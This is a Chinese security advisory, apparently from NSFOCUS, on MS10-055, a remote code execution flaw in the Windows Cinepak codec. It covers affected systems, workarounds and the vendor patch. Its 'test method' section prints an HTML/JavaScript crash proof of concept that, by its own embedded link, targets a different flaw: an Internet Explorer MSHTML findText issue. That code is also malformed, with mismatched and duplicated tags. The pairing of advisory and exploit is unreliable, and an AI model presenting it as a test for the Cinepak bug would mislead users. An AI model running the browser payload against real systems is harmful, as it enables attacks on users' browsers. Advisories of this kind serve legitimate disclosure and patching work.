安全研究

安全漏洞
Microsoft Windows Cinepak编解码器媒体解压远程代码执行漏洞(MS10-055)

发布日期:2010-08-10
更新日期:2010-08-13

受影响系统:
Microsoft Windows XP SP3
Microsoft Windows XP Pro x64版SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows 7
描述:
BUGTRAQ  ID: 42256
CVE(CAN) ID: CVE-2010-2553

Microsoft Windows是微软发布的非常流行的操作系统。

Windows操作系统中使用Cinepak编解码器(iccvid.dll)模块负责压缩和解压VIDC(Cinepak)流,其中CVDecompress()函数分配了静态数量的空间用于存储RGB画板。如果攻击者修改了AVI文件中的VIDC压缩流,就可以强制iccvid中的代码过多循环,每次循环都会递增画板存储的指针。通过滥用这种行为攻击者就可以以当前用户的权限执行任意代码。

<*来源:ZDI (http://www.zerodayinitiative.com/)
  
  链接:http://secunia.com/advisories/40936/
        http://marc.info/?l=bugtraq&m=128151900521880&w=2
        http://www.us-cert.gov/cas/techalerts/TA10-222A.html
        http://www.microsoft.com/technet/security/bulletin/MS10-055.mspx?pf=true
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>  

<body>  

<input type="button" value="Crachme!" onclick="Search()"/>  

<input  type="text" value="Abysssec" id="Abysssec"></textarea>  

  

<script type="text/javascript">  

function Search(){  

var textinput  = document.getElementById("Abysssec");  

  

var textRange = textinput.createTextRange();  

textRange.findText(unescape("%u4141"),-1);  

textRange.select(document.getElementById('d'));  

document.body.appendChild(textinput);  

}  

</script>  

<p id="p">Abysssec</p>  

http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/  

</body>  

</html>  

</p>  

</body>  

</html>

http://www.exploit-db.com/download/15112

建议:
临时解决方法:

* 修改iccvid.dll的ACL。
    
* 在DirectShow中禁止解析Cinepac编码的文件。
    
* 注销quartz.dll。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS10-055)以及相应补丁:
MS10-055:Vulnerability in Cinepak Codec Could Allow Remote Code Execution (982665)
链接:http://www.microsoft.com/technet/security/bulletin/MS10-055.mspx?pf=true

浏览次数:3491
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障